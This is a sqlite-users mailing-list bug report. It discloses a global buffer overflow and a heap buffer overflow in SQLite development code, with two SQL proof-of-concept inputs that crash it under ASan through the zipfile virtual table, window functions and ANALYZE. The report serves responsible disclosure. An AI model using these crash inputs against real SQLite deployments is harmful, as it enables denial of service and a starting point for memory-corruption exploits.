Hi,

We found a global buffer overflow and a heap buffer overflow in sqlite. Here's the POC (trigger with asan):

Global buffer overflow:
--
CREATE TABLE v0 ( v6 INTEGER UNIQUE , v5 , v3 , v4 , v2 , v7 , v1 ) ;
INSERT INTO v0 ( v3 ) VALUES ( 0 ) ,( 10 ) ,( 10.100000 ) ,( 10 ) ,( 10 ) ,( 10 ) ,( 10 ) ,( 10 ) ,( 1 ) ,( 'GERMANY' ) ,( 'LG PKG' ) ,( 'SM PKG' ) ,( '%%green%%' ) ,( 'DELIVER IN PERSON' ) ,( 'MED PKG' ) ;
SELECT v5 , lag ( v1 , 10.100000 ) OVER( PARTITION BY v1 ORDER BY v5 ) FROM v0 ;
ANALYZE v0 ;
CREATE VIRTUAL TABLE v8 USING zipfile ( v9 PRIMARY KEY ON CONFLICT REPLACE NOT NULL UNIQUE ON CONFLICT REPLACE ) ;
ANALYZE ;
REPLACE INTO v8 SELECT * FROM v0 ;
SELECT * FROM v0 AS c NATURAL JOIN v0 AS p , v0 NATURAL JOIN v8 NATURAL JOIN v0 ;
--

Heap buffer overflow:
--
CREATE TABLE v0 ( v5 INTEGER UNIQUE , v6 , v7 , v2 , v3 , v4 INTEGER UNIQUE ON CONFLICT IGNORE CHECK( 10 ) CHECK( 10 ) , v1 ) ;
INSERT INTO v0 ( v4 ) VALUES ( 10 ) ,( 1 ) ,( 10 ) ;
SELECT v4 , lag ( v2 , 0.100000 ) OVER( PARTITION BY v4 ORDER BY v6 ) FROM v0 ;
ANALYZE v0 ;
CREATE VIRTUAL TABLE v8 USING zipfile ( v9 PRIMARY KEY ON CONFLICT REPLACE NOT NULL UNIQUE ) ;
ANALYZE ;
REPLACE INTO v8 SELECT * FROM v0 ;
SELECT * FROM v8 AS c NATURAL JOIN v8 AS p , v0 NATURAL JOIN v8 NATURAL JOIN v8 ;
--

The bug exists in the latest development code of sqlite.

Yongheng & Rui

_______________________________________________
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users